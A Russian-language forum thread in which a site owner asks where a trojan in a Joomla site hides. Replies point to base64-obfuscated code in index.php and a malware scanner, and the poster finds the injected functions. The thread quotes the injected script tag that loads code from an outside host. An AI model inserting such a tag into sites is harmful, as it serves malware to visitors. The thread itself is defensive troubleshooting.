Где сидит троян? ))) - Безопасность сайтов на Joomla

Здравствуйте. Сам я специалистом по Joomla не являюсь (то что приходилось делать для web-а делал руками). Но тут ко мне обратились хорошие знакомые с просьбой помочь. У них есть сайт на Joomla. В какой-то момент на сайт подсел вирус. На конец страниц подвешивается текст "<script src="http://accountus.gets-it.net/googlestat.php"></script>". Откуда он берется понять не могу. Шаблон чистый (понятно, что в сгенерированных на сайте html'ях этот текст сидит, но это к делу не относится - все php шаблона чистые). Сбросил dump базы и попробовал поискать в нем. Тоже всё чисто. Не подскажете ли, бывалые джумловоды, откуда такая ерунда берется, где живет и чем выводится? Заранее благодарен, Евгений.

Проверьте Java скрипты, очень похоже что зараза именно в них.

Затруднительно искать-то.))) Как я уже сказал, прямым текстом вредоносный код нигде не встречается (в скриптах, разумеется тоже искал). И потом, не вполне понял. Текст "приклеивается" в самый конец файла, уже после тега </html>. Как его туда скрипт приклеить может?

Затруднительно искать-то.))) Как я уже сказал, прямым текстом вредоносный код нигде не встречается (в скриптах, разумеется тоже искал). И потом, не вполне понял. Текст "приклеивается" в самый конец файла, уже после тега </html>. Как его туда скрипт приклеить может?

При соответствующих правах, скрипт с файлом может делать все что угодно и вертеть как хочет, логично что если его там не было и он как то там оказался, значит вас ломанули...

Текст "приклеивается" в самый конец файла, уже после тега </html>. Как его туда скрипт приклеить может?

index.php в корне сайта

При соответствующих правах, скрипт с файлом может делать все что угодно и вертеть как хочет, логично что если его там не было и он как то там оказался, значит вас ломанули...

Об этом я догадался. Я не могу найти, куда подсадили вредоносный код, который генерирует эту бяку.

index.php в корне сайта

Простите, я в вопросах jooml'ы совсем чайник. Под корнем вы имеете ввиду подкаталог [docs]? (в корне сайта я вижу только index.html).

Прямым текстом и не найдете, 99% что код идет в base64 кодировке. Можно проверить сайт с помощью скрипта Ai-Bolit http://www.revisium.com/ai/ - он должен найти заразу.

Прямым текстом и не найдете, 99% что код идет в base64 кодировке. Можно проверить сайт с помощью скрипта Ai-Bolit http://www.revisium.com/ai/ - он должен найти заразу.

Спасибо огромное! Да, выловил он левую функцию (и ее вызов) в корневом index.php, и еще загримированный под jquery include в Index.php в корне темы... Посмотрим как дальше себя это дело поведет. Еще раз большое спасибо.